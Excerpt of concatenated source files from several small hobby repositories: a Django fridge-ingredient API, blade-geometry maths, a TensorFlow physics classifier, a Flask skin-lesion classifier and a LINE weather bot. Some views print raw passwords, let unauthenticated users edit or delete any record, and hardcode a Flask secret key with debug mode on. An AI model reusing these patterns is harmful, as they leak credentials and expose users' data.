class ImageSerializer(serializers.ModelSerializer):
class Meta:
model = inputFile
fields = ['image']
# class ingredientsSerializer(serializers.ModelSerializer):
# class Meta:
# model = ingredients
# fields = '__all__'
--- FILE SEPARATOR ---
from rest_framework.response import Response
from django.http import HttpResponseNotFound, HttpResponseForbidden
from django.shortcuts import get_object_or_404
from rest_framework.permissions import AllowAny
from rest_framework.decorators import api_view, permission_classes
from django.contrib.auth.models import User
from .serializers import UserCreationSerializer,UserSerializer,PasswordChangeSerializer, ImageSerializer, SectionSerializer
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from media.AI import Image_Searcher
from .models import ingredients
import os
import datetime, json
from shutil import copyfile
current = datetime.datetime.now()
current = datetime.date(int(str(current)[:4]), int(str(current)[5:7]), int(str(current)[8:10]))
@api_view(['GET'])
@permission_classes((AllowAny,))
def checkOverlap(request):
username = request.data
if User.objects.filter(username=username):
return Response(False)
else:
return Response(True)
@api_view(['POST'])
# settings의 isAuthenticated 무시하고 로그인이 되지 않더라도 요청 허용
@permission_classes((AllowAny, ))
def signUp(request):
serializer = UserCreationSerializer(data=request.data)
print("username:",serializer.initial_data)
username = serializer.initial_data.get('username')
if serializer.is_valid():
# serializer.save()의 return 값은 모델의 인스턴스
user = serializer.save()
# User model의 인스턴스가 갖고 있는 set_password -> 인자는 raw password가 들어감
user.set_password(request.data.get('password'))
user.save()
print(serializer.data)
return Response({'message': '회원가입이 성공적으로 완료되었습니다.'})
else:
return Response(serializer.errors, status=400)
user_manage_param = openapi.Parameter('password', openapi.IN_QUERY, type=openapi.TYPE_STRING)
user_response = openapi.Response('response description', UserSerializer)
@swagger_auto_schema(method='put', manual_parameters=[user_manage_param], responses={200: user_response})
@api_view(['GET','PUT','DELETE'])
def user_manage(request, id):
user = get_object_or_404(User,pk=id)
# print("user method:",dir(user))
if request.user != user:
# Response(status=403) 과 동일
return HttpResponseForbidden()
if request.method == 'GET':
serializer = UserSerializer(user)
return Response(serializer.data)
if request.method == 'PUT':
# 기존 todo에서 request.POST(수정 내용)으로 변경
serializer = PasswordChangeSerializer(user,request.POST)
usercheck = serializer
print(usercheck)
if serializer.is_valid():
print('PASSWORD:',request.data.get('password'))
user.set_password(request.data.get('password'))
user.save()
return Response(serializer.data)
# 유효하지 않으면 에러메세지와 함께 400 에러
return Response(serializer.errors, status=400)
if request.method == 'DELETE':
user.delete()
print("IS_DELETED:",User.objects.filter(pk=id))
# 204 -> 해당하는 컨텐츠가 없는 경우(todo를 삭제했기 때문에 해당하는 todo가 존재하지 않음을 알려줌)
return Response(status=204)
@api_view(['POST'])
def get_image(request):
print(request)
return Response(status=404)
user_manage_param = openapi.Parameter('image', openapi.IN_QUERY, type=openapi.TYPE_FILE)
user_response = openapi.Response('response description', UserSerializer)
@swagger_auto_schema(method='post', manual_parameters=[user_manage_param], responses={200: user_response})
@api_view(['POST'])
@permission_classes((AllowAny, ))
def test(request):
# return Response({'message:url&view test success!'})
# print(dir(request.query_params))
serializer = ImageSerializer(data=request.data)
result = Image_Searcher.detector(request.data, request.data.get('username'))
for file in os.scandir('./media/AI/Data/Test_images/'):
os.remove(file.path)
return Response(result)
@api_view(['POST'])
@permission_classes((AllowAny, ))
def addIngredients(request):
# for req_data in request.data:
print(request.data)
if request.method == 'POST':
# image_file =
for req_data in request.data:
postpone = req_data.get('expirationDate')
days = current + datetime.timedelta(int(postpone))
food = ingredients(name=req_data.get('name'),image = req_data.get('iamge'), user_id = req_data.get('user_id'), floor=req_data.get('floor'), expire_date = str(days)[:10], classification = req_data.get('kind'))
food.save()
return Response(status=200)
@api_view(['GET'])
@permission_classes((AllowAny, ))
def getIngredients(request,id):
user = User.objects.get(id = id)
food_lists = ingredients.objects.filter(user_id = id)
foods = []
for food_list in food_lists:
if not os.path.exists('./media/AI/crop_img/'+user.username+'/'):
os.makedirs('./media/AI/crop_img/'+user.username+'/')
if not os.path.exists('./media/AI/crop_img/'+user.username+'/'+food_list.name[:10]+'.jpg'):
copyfile('./media/AI/crop_img/no_image.jpg', './media/AI/crop_img/'+user.username+'/'+food_list.name[:10]+'.jpg' )
pass
food = []
food.append(food_list.name)
food.append(food_list.expire_date)
food.append(food_list.created_at)
food.append(food_list.classification)
food.append(food_list.content)
food.append(food_list.floor)
postpone = datetime.date(int(food_list.expire_date[:4]), int(food_list.expire_date[5:7]), int(food_list.expire_date[8:]))
sub_days = postpone - current
food.append(sub_days.days)
food.append(food_list.id)
foods.append(food)
return Response(foods)
@api_view(['PUT','DELETE'])
@permission_classes((AllowAny, ))
def updateIngredients(request,id):
data = request.data
food = ingredients.objects.get(pk=id)
if request.method =='PUT':
print(request.data)
if type(data) == int:
food.floor = 4-data
food.save()
else:
food.name = data['name']
food.image = data['img_path']
food.floor = data['floor']
date = current + datetime.timedelta(days=int(data['expirationDate']))
food.expire_date = date
food.classification = data['category']
food.content = data['note']
food.save()
if request.method =='DELETE':
food.delete()
return Response(status=204)
return Response(data, status=204)
|
[
"/AI/IMAGE_DETECTION/Image_Searcher.py",
"/AI/transferLearning/TL.py",
"/AI/transferLearning/TL3.py",
"/web/backend/backend/urls.py",
"/web/backend/media/AI/Image_Searcher.py",
"/web/backend/userApi/admin.py",
"/web/backend/userApi/migrations/0003_auto_20200604_1532.py",
"/web/backend/userApi/migrations/0004_auto_20200604_1540.py",
"/web/backend/userApi/migrations/0005_contents_floor.py",
"/web/backend/userApi/models.py",
"/web/backend/userApi/serializers.py",
"/web/backend/userApi/views.py"
] |
0110lekniw/blade-geometry
|
from methods.excel_import import importRotorCharacteristics, importCanalCoordinates, importRotorCoordinates
rotor_37_coordinates = importRotorCoordinates(
'/Volumes/Bridge/Aviation /Bachelor/blade-geometry/Rotor_Coordinates.xlsx')
rotor_37_charateristics = importRotorCharacteristics(
'/Volumes/Bridge/Aviation /Bachelor/blade-geometry/Rotor_Coordinates.xlsx')
canal_coordinates = importCanalCoordinates(
'/Volumes/Bridge/Aviation /Bachelor/blade-geometry/Canal.xlsx')
--- FILE SEPARATOR ---
import numpy as np
import math
import cmath
def quadraticRealRoots(a, b, c):
roots = 0
if a == 0:
print("Not a quadratic equation")
differentiator = b**2 - 4*a*c
if differentiator == 0:
roots = -b/(2*a)
elif differentiator > 0:
root_1 = (-b-math.sqrt(differentiator))/(2*a)
root_2 = (-b+math.sqrt(differentiator))/(2*a)
roots = [root_1, root_2]
elif differentiator < 0:
print("No roots in the set of real numbers ")
return roots
def quadraticRoots(a, b, c):
coefficients = np.array([a, b, c])
for i in range(coefficients.shape[0]):
if not isinstance(coefficients[i], complex):
coefficients[i] = complex(coefficients[i], 0)
differentiator = coefficients[1]**2-coefficients[0]*coefficients[2]*4
root_1 = (-coefficients[1] - cmath.sqrt(differentiator)) / (2 * coefficients[0])
root_2 = (-coefficients[1] + cmath.sqrt(differentiator)) / (2 * coefficients[0])
roots = [root_1, root_2]
return roots
def linearCramerRoots(left_hand_side_matrix, right_hand_side_matrix):
roots = np.zeros((left_hand_side_matrix.shape[0]))
main_determination = round(np.linalg.det(left_hand_side_matrix), 10)
for column in range(left_hand_side_matrix.shape[1]):
root_matrix = np.array(left_hand_side_matrix)
root_matrix[:, column] = right_hand_side_matrix[:, 0]
root_determination = round(np.linalg.det(root_matrix), 10)
roots[column] = root_determination / main_determination
return roots
--- FILE SEPARATOR ---
import pandas as pd
import numpy as np
import math
# import coordinates of rotor blade and create numpy array
def importRotorCoordinates(coordinates_excel_path):
profiles_number = np.array(pd.ExcelFile(coordinates_excel_path).sheet_names).shape[0]
number_of_coordinates = 0
for i in range(profiles_number):
coordinates = pd.read_excel(coordinates_excel_path, sheet_name=i).to_numpy()[7:, :]
if coordinates.shape[0] > number_of_coordinates:
number_of_coordinates = coordinates.shape[0]
rotor_coordinates = np.zeros((number_of_coordinates, 6, profiles_number))
for i in range(profiles_number):
data = pd.read_excel(coordinates_excel_path, sheet_name=i).to_numpy()
pressure_side_coordinates = np.array([data[7:, 0], data[7:, 1]]).transpose()
suction_side_coordinates = np.array([data[7:, 0], data[7:, 2]]).transpose()
rotor_coordinates[:pressure_side_coordinates.shape[0], :2, i] = pressure_side_coordinates[:, :]
rotor_coordinates[:pressure_side_coordinates.shape[0], 3, i] = data[0, 1]
rotor_coordinates[:suction_side_coordinates.shape[0], 3:5, i] = suction_side_coordinates[:, :]
rotor_coordinates[:pressure_side_coordinates.shape[0], 5, i] = data[0, 1]
return rotor_coordinates
# import coordinates of canal and create numpy array
def importCanalCoordinates(canal_excel_path):
coordinates = pd.read_excel(canal_excel_path).to_numpy()
return coordinates
# import charateristics of rotor and create numpy array
def importRotorCharacteristics(characterstics_excel_path):
profiles_number = np.array(pd.ExcelFile(characterstics_excel_path).sheet_names).shape[0]
rotor_characteristic = np.zeros((6, profiles_number))
for i in range(profiles_number):
data = pd.read_excel(characterstics_excel_path, sheet_name=i).to_numpy()
# Defining characteristic values:
# 0 = radius of profile;
# 1 = radius of the leading edge;
# 2 = radius of the trailing edge;
# 3 - x distance between beginning of the profile and stocking point;
# 4 - y distance between beginning of the profile and stocking point;
# 5 - angle of turn of coordinates around stocking point
rotor_characteristic[:5, i] = data[:5, 1]
rotor_characteristic[5, i] = data[5, 1] * (math.pi / 180)
return rotor_characteristic
--- FILE SEPARATOR ---
import numpy as np
import math
from methods.equations_solver import linearCramerRoots
# Calculation of linear function equation from two points
def twoPointsLinearFunction(point_one, point_two):
if point_one[0] == point_two[0]:
print('no function')
return 'non_func'
else:
a = (point_two[1] - point_one[1]) / (point_two[0] - point_one[0])
b = 0 + point_one[1] - point_one[0] * a
linear = np.poly1d([a, b])
return linear
# Calculation of linear functions intersection point
def linearFunctionsIntersections(function_one, function_two):
x = (function_two[0]-function_one[0])/(function_two[1]-function_one[1])
return np.array([x, function_two(x)])
# Calculation of vector matrix
def vectorCalculation(terminal_point, initial_point):
delta_x = terminal_point[0] - initial_point[0]
delta_y = terminal_point[1] - initial_point[1]
modulo = math.sqrt(delta_x**2+delta_y**2)
return np.array([delta_x, delta_y, modulo])
def scalarProductVector(vector_1, vector_2):
product = vector_1[0]*vector_2[0]+vector_1[1]*vector_2[1]
return product
def degreeBetweenVectors(vector_1, vector_2):
scalar_product = scalarProductVector(vector_1, vector_2)
cosinus_degree = scalar_product/(vector_1[2]*vector_2[2])
degree = math.acos(cosinus_degree)
return degree
def averageDegreeBisectorEquation(linear_one, linear_two, which_one):
# dc - directional coefficient
bisector_dc_smaller_angle = math.tan((math.atan(linear_one[1]) + math.atan(linear_two[1])) / 2)
intersection_point = linearFunctionsIntersections(linear_one, linear_two)
bisector_coefficient_smaller_angle = intersection_point[1] - intersection_point[0]*bisector_dc_smaller_angle
vector_one = vectorCalculation(intersection_point, np.array([intersection_point[0]+1,
(intersection_point[0]+1)*linear_one[0]+linear_one[1]]))
vector_two = vectorCalculation(intersection_point, np.array([intersection_point[0]+1,
(intersection_point[0]+1)*bisector_dc_smaller_angle+bisector_coefficient_smaller_angle]))
smaller_degree = degreeBetweenVectors(vector_one, vector_two)
if bisector_dc_smaller_angle == 0:
bisector_dc_larger_angle = 1
elif smaller_degree > math.pi/2:
smaller_degree = smaller_degree-math.pi/2
bisector_dc_smaller_angle = -1/bisector_dc_smaller_angle
else:
bisector_dc_larger_angle = -1/bisector_dc_smaller_angle
bisector_coefficient_larger_angle = intersection_point[1] - intersection_point[0]*bisector_dc_larger_angle
larger_degree = smaller_degree+math.pi/2
smaller_angle_biscetor = np.poly1d([bisector_dc_smaller_angle, bisector_coefficient_smaller_angle])
larger_angle_bisector = np.poly1d([bisector_dc_larger_angle, bisector_coefficient_larger_angle])
if which_one == 'smaller':
return smaller_angle_biscetor
else:
return larger_angle_bisector
def movePointsByVector(points, vector):
new_points = np.zeros((points.shape[0], points.shape[1]))
for i in range(points.shape[0]):
new_points[i, 0] = points[i, 0] + vector[0]
new_points[i, 1] = points[i, 1] + vector[1]
return new_points
def turnPoint(points, angle):
new_points = np.zeros((points.shape[0], points.shape[1]))
for i in range(points.shape[0]):
x = points[i, 0]
y = points[i, 1]
new_points[i, 0] = (x*math.cos(angle)-y*math.sin(angle))
new_points[i, 1] = (x*math.sin(angle)+y*math.cos(angle))
return new_points
def turnAroundPoint(points, degree, center_point):
vector_of_move = vectorCalculation(np.array([0, 0]), center_point)
moved_points = movePointsByVector(points, vector_of_move)
turned_points = turnPoint(moved_points, degree)
vector_of_move = np.multiply(vector_of_move, (-1))
expected_coordinates = movePointsByVector(turned_points, vector_of_move)
return expected_coordinates
--- FILE SEPARATOR ---
import numpy as np
from methods.equations_solver import linearCramerRoots
def linearInterpolation(x, y):
number_of_points = x.shape[0]
coefficients = np.empty((number_of_points-1, 2))
for i in range(0, number_of_points-1):
coefficients[i, 0] = (y[i+1]-y[i])/(x[i+1]-x[i])
coefficients[i, 1] = y[i] - x[i]*coefficients[i, 0]
return coefficients
def quadraticInterpolation(x, y):
number_of_points = x.shape[0]
coefficients = np.empty((number_of_points-1, 3))
a0 = (y[1] - y[0]) / (x[1] - x[0])
for i in range(0, number_of_points-1):
if i == 0:
n = 1
else:
n = i
A = np.empty((3, 3))
for row in range(2):
for column in range(3):
A[row, column] = x[i + row*1] ** (2 - column)
A[2, 0] = 2*x[n]
A[2, 1] = 1
A[2, 2] = 0
print(A)
B = np.array([[y[i]], [y[i+1]], [a0]])
# Calculating Coefficients of quadratic functions
coefficients[i] = linearCramerRoots(A, B)
a0 = coefficients[i, 0]*2*x[i+1]+coefficients[i, 1]
return coefficients
--- FILE SEPARATOR ---
import methods.geometrical_calculations as gc
import numpy as np
import matplotlib.pyplot as plt
import math
first_point = np.array([[0, 0], [1, 2], [2, 4]])
second_point = np.array([[-1, 10], [1, -10], [2, -20]])
fig = plt.figure(figsize=(10, 10))
linear_function_1 = gc.twoPointsLinearFunction(first_point[0, :], first_point[1, :])
linear_function_2 = gc.twoPointsLinearFunction(second_point[0, :], second_point[1, :])
x = np.linspace(-10, 10, 100)
plt.plot(x, linear_function_1(x), '+', x, linear_function_2(x), '+')
# bisectors = gc.averageDegreeBisectorEquation(linear_function_1, linear_function_2, 'larger')
# plt.plot(x, bisectors(x), color='b')
degree = math.pi/2
first_points_turned = gc.turnAroundPoint(first_point, degree, np.array([0, 0]))
second_points_turned = gc.turnAroundPoint(second_point, degree, np.array([0, 0]))
linear_function_3 = gc.twoPointsLinearFunction(first_points_turned[0, :], first_points_turned[1, :])
linear_function_4 = gc.twoPointsLinearFunction(second_points_turned[0, :], second_points_turned[1, :])
plt.plot(x, np.zeros((x.shape[0],1)), color='k')
plt.plot(np.zeros((x.shape[0],1)), x, color='k')
plt.plot(x, linear_function_3(x), '-', x, linear_function_4(x), '-')
plt.scatter(first_point[:, 0], first_point[:, 1], color="k")
plt.scatter(first_points_turned[:, 0], first_points_turned[:, 1], color="g")
plt.scatter(second_point[:, 0], second_point[:, 1], color="r")
plt.scatter(second_points_turned[:, 0], second_points_turned[:, 1], color="y")
plt.show()
|
[
"/main.py",
"/methods/equations_solver.py",
"/methods/excel_import.py",
"/methods/geometrical_calculations.py",
"/methods/interpolation.py",
"/testing/test.py"
] |
011235813/higgs_ml
|
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile
import networks
import argparse
class Classifier():
def __init__(self, num_layers, nonlinearity1, nonlinearity2,
nonlinearity3, n_inputs, n_hidden1, n_hidden2,
n_hidden3, n_outputs, lr, batch_size,
input_file, log_dir, gpu, test_mode):
self.filename = 'HIGGS.csv'
self.file_length = 11000000
self.lr = lr
self.batch_size = batch_size
self.log_dir = log_dir
self.test_mode = test_mode
self.map_str_nonlinearity = {'relu':tf.nn.relu, 'tanh':tf.nn.tanh}
self.examples, self.labels = self.input_pipeline()
self.create_network(num_layers, nonlinearity1, nonlinearity2,
nonlinearity3, n_inputs, n_hidden1,
n_hidden2, n_hidden3, n_outputs)
# TODO: need to create test set
if not self.test_mode:
self.train_op = self.create_training_method()
# for recording the entire network weights
self.saver = tf.train.Saver()
if gpu:
session_config = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True)
session_config.gpu_options.allow_growth = True
self.session = tf.InteractiveSession(config=session_config)
else:
self.session = tf.InteractiveSession()
self.session.run(tf.global_variables_initializer())
def create_network(self, num_layers, nonlinearity1, nonlinearity2,
nonlinearity3, n_inputs, n_hidden1,
n_hidden2, n_hidden3, n_outputs):
#self.vec_input = tf.placeholder(dtype=tf.float64,
# shape=[None, n_inputs],
# name='vec_input')
self.is_train = tf.placeholder(dtype=tf.bool,
name='is_train')
if num_layers == 3:
self.y = networks.hidden3_bn(self.examples, n_hidden1,
n_hidden2, n_hidden3,
n_outputs, self.map_str_nonlinearity[nonlinearity3], self.is_train)
def read_from_csv(self, filename_queue):
reader = tf.TextLineReader(skip_header_lines=0)
key, value = reader.read(filename_queue)
record_defaults = [[0.0]] * 29
columns = tf.decode_csv(value, record_defaults)
features = tf.stack(columns[1:])
label = tf.stack(columns[0:1])
return features, label
def input_pipeline(self, num_epochs=None):
filename_queue = tf.train.string_input_producer([self.filename])
example, label = self.read_from_csv(filename_queue)
min_after_dequeue = 10000
capacity = min_after_dequeue + 3 * self.batch_size
example_batch, label_batch = tf.train.shuffle_batch(
[example, label], batch_size=self.batch_size,
capacity=capacity,
min_after_dequeue=min_after_dequeue)
label_batch_int = tf.squeeze(tf.cast(label_batch, dtype=tf.int32))
return example_batch, label_batch_int
def create_training_method(self):
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.cast(tf.round(self.y),dtype=tf.int32), self.labels), dtype=tf.float32))
with tf.name_scope('loss'):
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.labels, logits=self.y))
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(loss)
return train_op
def main(self):
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
count = 0
try:
# while not coord.should_stop():
while count < 3:
example_batch, label_batch = self.session.run([self.examples,self.labels])
print 'Examples', example_batch
print 'Labels', label_batch
# self.session.run(self.train_op)
count += 1
except tf.errors.OutOfRangeError:
print("Done training")
print count
finally:
coord.request_stop()
coord.join(threads)
self.session.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_layers", default=1,
type=int, choices=[1,2,3],
help="number of hidden layers")
parser.add_argument("--nonlinearity1", default='relu',
type=str, help="nonlinear function for hidden layer 1")
parser.add_argument("--nonlinearity2", default='relu',
type=str, help="nonlinear function for hidden layer 2")
parser.add_argument("--nonlinearity3", default='relu',
type=str, help="nonlinear function for hidden layer 3. If three layers, then nonlinearity for first two layers is fixed as relu")
parser.add_argument("--n_inputs", default=28,
type=int, help="dimension of input layer")
parser.add_argument("--n_hidden1", default=128,
type=int, help="width of hidden layer 1")
parser.add_argument("--n_hidden2", default=128,
type=int, help="width of hidden layer 2")
parser.add_argument("--n_hidden3", default=128,
type=int, help="width of hidden layer 3")
parser.add_argument("--lr", default=1e-3,
type=float, help="optimizer learning rate")
parser.add_argument("--batch_size", default=64,
type=int, help="batch size")
parser.add_argument("--input_file", default='HIGGS.csv',
type=str, help="location to save network, tensorboard and results")
parser.add_argument("--log_dir", default=None,
type=str, help="location to save network, tensorboard and results")
parser.add_argument("--gpu", action="store_true",
help="if flag is set, then configures tensorflow session for GPU")
parser.add_argument("--test", action="store_true",
help="if flag is set, then reads network from log_dir and tests on test data")
args = parser.parse_args()
c = Classifier(args.num_layers, args.nonlinearity1,
args.nonlinearity2, args.nonlinearity3,
args.n_inputs, args.n_hidden1, args.n_hidden2,
args.n_hidden3, 1, args.lr, args.batch_size,
args.input_file, args.log_dir, args.gpu, args.test)
c.main()
--- FILE SEPARATOR ---
import tensorflow as tf
import numpy as np
def batch_normalized_linear_layer(vec_input, num_nodes, nonlinearity,
is_train, scope):
if nonlinearity == None:
nonlinearity = tf.identity
with tf.variable_scope(scope):
x = tf.contrib.layers.fully_connected(inputs=vec_input,
num_outputs=num_nodes,
activation_fn=None,
scope='dense')
y = tf.contrib.layers.batch_norm(inputs=x, center=True,
scale=True,
is_training=is_train, scope='bn')
return nonlinearity(y)
def linear_layer(vec_input, num_nodes, nonlinearity, scope):
if nonlinearity == None:
nonlinearity = tf.identity
with tf.variable_scope(scope):
h = tf.contrib.layers.fully_connected(inputs=vec_input,
num_outputs=num_nodes,
activation_fn=nonlinearity)
return h
--- FILE SEPARATOR ---
import tensorflow as tf
from layers import *
def hidden3_bn(vec_input, n_hidden1, n_hidden2, n_hidden3, n_outputs,
nonlinearity3, is_train):
h1 = batch_normalized_linear_layer(vec_input=vec_input,
num_nodes=n_hidden1,
nonlinearity=tf.nn.relu,
is_train=is_train, scope='fc1')
h2 = batch_normalized_linear_layer(vec_input=h1, num_nodes=n_hidden2,
nonlinearity=tf.nn.relu,
is_train=is_train, scope='fc2')
h3 = batch_normalized_linear_layer(vec_input=h2, num_nodes=n_hidden3,
nonlinearity=nonlinearity3,
is_train=is_train, scope='fc3')
out = linear_layer(vec_input=h3, num_nodes=n_outputs,
nonlinearity=None, scope='out')
return out
|
[
"/classifier.py",
"/layers.py",
"/networks.py"
] |
01234567j/ucsd-ext-put-final
|
# counter.py
def inc(x):
'''
Increments the value of x
>>> inc(4)
5
'''
return x + 1
def dec(x):
'''
Decrements the value of x
>>> dec(5)
4
'''
return x - 1
--- FILE SEPARATOR ---
import counter
import pytest
def test_counter_inc():
assert counter.inc(4) == 5
def test_counter_dec():
assert counter.dec(5) == 4
|
[
"/counter.py",
"/test_counter.py"
] |
0124hitesh/Skin-Cancer-Detection
|
import os
from flask import Flask, request, render_template, send_from_directory, redirect, url_for, flash, jsonify
from PIL import Image
import datetime
import re
import base64
from flask_cors import CORS
from io import BytesIO
from predict_model import predict
app = Flask(__name__)
# app = Flask(__name__, static_folder="images")
CORS(app)
app.config['SECRET_KEY'] = "myspecial"
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
def base64_to_image(base64_str, image_path=None):
base64_data = re.sub('^data:image/.+;base64,', '', base64_str)
byte_data = base64.b64decode(base64_data)
image_data = BytesIO(byte_data)
img = Image.open(image_data)
if image_path:
img.save(image_path)
return img
@app.errorhandler(404)
def not_found(e):
return render_template("404.html")
@app.route("/")
def index():
return render_template("upload.html")
@app.route("/upload", methods=["POST","GET"])
def upload():
if request.method == 'GET':
flash("this method is not allowed","error")
return redirect(url_for('index'))
target = os.path.join(APP_ROOT, 'images/')
print(target)
if not os.path.isdir(target):
os.mkdir(target)
else:
print("Couldn't create upload directory: {}".format(target))
print("\n\n>>",request.files.getlist("file"),"<<\n\n")
uploaded_file = request.files.getlist("file")[0]
print(">>>",uploaded_file.filename)
if uploaded_file.filename == '':
flash("invalid file","error")
return redirect(url_for("index"))
print("{} is the file name".format(uploaded_file.filename))
filename = uploaded_file.filename
time = str(datetime.datetime.today().strftime('%H-%M-%S'))
date = str(datetime.date.today())
extension = os.path.splitext(filename)[1]
new_file_name = time + "_" + date + extension
destination = "/".join([target, new_file_name])
print ("Accept incoming file:", filename)
print ("Save it to:", destination)
uploaded_file.save(destination)
# for upload in request.files.getlist("file"):
# print(upload)
# print("{} is the file name".format(upload.filename))
# filename = upload.filename
# destination = "/".join([target, filename])
# print ("Accept incoming file:", filename)
# print ("Save it to:", destination)
# upload.save(destination)
print("\n\n\n---------",destination)
ans = predict(destination)
print("\n\n\n",ans,"\n\n\n")
# return send_from_directory("images", filename, as_attachment=True)
return render_template("complete_display_image.html", image_name=new_file_name, ans = ans)
@app.route('/upload/<filename>')
def send_image(filename):
return send_from_directory("images", filename)
@app.route('/gallery')
def get_gallery():
image_names = os.listdir('./images')
print(image_names)
return render_template("gallery.html", image_names=image_names)
# @app.route('/result/<filename>')
# def show_result(filename):
# image_name = filename
# print("filename",filename)
# return render_template("complete_display_image.html",image_name = image_name)
@app.route("/upload1", methods=["POST","GET"])
def process_image1():
if request.method == 'GET':
return jsonify({"ans" : "this method is not allowed"}),405
file = request.form['image']
if file == 'null':
return jsonify({"ans" : "image is not valid"})
target = os.path.join(APP_ROOT, 'images/')
print("\n\n target",target,"\n\n")
if not os.path.isdir(target):
os.mkdir(target)
else:
print("Couldn't create upload directory: {}".format(target))
time = str(datetime.datetime.today().strftime('%H-%M-%S'))
date = str(datetime.date.today())
file_name = new_file_name = time + "_" + date + '.jpg'
destination = "/".join([target,file_name])
img = base64_to_image(file, destination)
ans = predict(destination)
return jsonify({"ans" : ans})
if __name__ == "__main__":
app.run(port=4555, debug=True)
--- FILE SEPARATOR ---
import os
import numpy as np
from PIL import Image
import tensorflow as tf
from tensorflow import keras
interpreter = tf.lite.Interpreter(model_path='./model.tflite')
interpreter.allocate_tensors()
read = lambda imname: np.asarray(Image.open(imname).convert("RGB"))
print("\n\n\n","inside predict","\n\n\n")
def predict(imag_name):
image = Image.open(imag_name)
resized_im = image.resize((224,224))
resized_im.save(imag_name)
img = [read(imag_name)]
#img=img.resize((224,224))
img_1 = np.array(img, dtype='float32')
img_2 = img_1/255
#img = cv2.imread(r"{}".format(file.resolve()))
#new_img = cv2.resize(img, (224, 224))
#ans = model_1.predict(img_2)
input_details = interpreter.get_input_details()
# print(interpreter.get_input_details())
output_details = interpreter.get_output_details()
# Test the model on random input data.
input_shape = input_details[0]['shape']
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], img_2)
interpreter.invoke()
# The function `get_tensor()` returns a copy of the tensor data.
# Use `tensor()` in order to get a pointer to the tensor.
a = interpreter.get_tensor(output_details[0]['index'])
a = np.argmax(a, axis = 1)[0]
if a == 0:
return "benign"
else:
return "malignant"
|
[
"/app.py",
"/predict_model.py"
] |
0140454/weather-bot
|
from django.conf import settings
import apiai
import json
def intent_parser(input):
client = apiai.ApiAI(settings.API_AI_CLIENT_ACCESS_TOKEN)
request = client.text_request()
request.query = input
response = request.getresponse()
return json.loads(response.read().decode())
if __name__ == '__main__':
print(intent_parser('今天屏東天氣怎樣'))
print(intent_parser('高雄天氣好嗎'))
print(intent_parser('快告訴我台南的天氣'))
print(intent_parser('跟我說說臺北的天氣'))
--- FILE SEPARATOR ---
from django.shortcuts import render
from django.conf import settings
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden
from django.views.decorators.csrf import csrf_exempt
from linebot import LineBotApi, WebhookParser
from linebot.exceptions import InvalidSignatureError, LineBotApiError
from linebot.models import MessageEvent, TextMessage, TextSendMessage
from .weather import get_current_weather
from .api_ai import intent_parser
line_bot_api = LineBotApi(settings.LINE_CHANNEL_ACCESS_TOKEN)
parser = WebhookParser(settings.LINE_CHANNEL_SECRET)
@csrf_exempt
def callback(request):
DEFAULT_LOCATION = '臺南市'
if request.method == 'POST':
signature = request.META['HTTP_X_LINE_SIGNATURE']
body = request.body.decode('utf-8')
try:
events = parser.parse(body, signature)
except InvalidSignatureError:
return HttpResponseForbidden()
except LineBotApiError:
return HttpResponseBadRequest()
for event in events:
if isinstance(event, MessageEvent):
if isinstance(event.message, TextMessage):
intent = intent_parser(event.message.text)
if intent['result']['action'] == 'input.unknown':
if '天氣' in event.message.text:
response = '目前無法理解您要查詢哪一個城市。\n' \
'以下將替您查詢%s的天氣。\n\n' \
'%s' % (DEFAULT_LOCATION, get_current_weather(DEFAULT_LOCATION))
else:
response = event.message.text
else:
place = intent['result']['parameters']['taiwan-city']
if len(place) == 0:
place = DEFAULT_LOCATION
response = get_current_weather(place)
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text = response)
)
return HttpResponse()
else:
return HttpResponseBadRequest()
--- FILE SEPARATOR ---
from django.conf import settings
import xml.etree.ElementTree as ET
import urllib.request
def get_current_weather(city):
"""
Get current weather in specific city.
Args:
city: City Name
Returns:
Current weather string
"""
response = urllib.request.urlopen('http://opendata.cwb.gov.tw/opendataapi?dataid=F-C0032-001&authorizationkey=%s' % settings.CWB_AUTHED_KEY)
tree = ET.parse(response).getroot()
for location in tree.findall('.//{urn:cwb:gov:tw:cwbcommon:0.1}location'):
if city in location[0].text:
# If the city is found, access its child direct.
return '%s目前的天氣為%s。\n' \
'溫度為 %s 至 %s ℃,降雨機率為 %s %%。' \
% (location[0].text, location[1][1][2][0].text,
location[3][1][2][0].text, location[2][1][2][0].text,
location[5][1][2][0].text)
return '很抱歉,無法提供您該城市的天氣。'
if __name__ == '__main__':
print(get_current_weather('臺南'))
|
[
"/service/api_ai.py",
"/service/views.py",
"/service/weather.py"
] |
0152la/CLsmithResultViewer
|
import re
numeric_value = re.compile(r'[^0-9a-fx]')
def FilterMatching(sample, contents, target, filter_fails = False):
filtered_progs = []
for program in sample:
if sample[program] != contents[program][target]:
if filter_fails and bool(numeric_value.match(contents[program][target])):
continue
filtered_progs.append(program)
return sorted(filtered_progs)
def FilterPlat(contents, target, filter_plat, filter_fails = False):
filtered_progs = []
for program in contents:
if contents[program][target] != contents[program][filter_plat]:
if filter_fails and bool(numeric_value.match(contents[program][target])):
continue
filtered_progs.append(program)
return sorted(filtered_progs)
--- FILE SEPARATOR ---
#!/usr/bin/python
import os
import glob
import collections
import re
def ParseData(location = os.getcwd()):
os.chdir(location)
files = glob.glob("*.csv")
numeric_value = re.compile(r'[^0-9a-fx]')
votes_min = 3
raw_contents = dict()
contents = dict()
line_nos = dict()
" Read raw contents from csv files"
print("Reading results from files...")
for filename in files:
platform_name = ' '.join(filename.split('.')[0].split('_'))
csvfile = open(filename, 'r')
raw_contents[platform_name] = csvfile.read().splitlines()
raw_contents[platform_name] = [s.strip() for s in \
(filter(None, raw_contents[platform_name]))]
" Organize raw contents "
print("Organizing raw results...")
for platform in raw_contents:
for line in raw_contents[platform]:
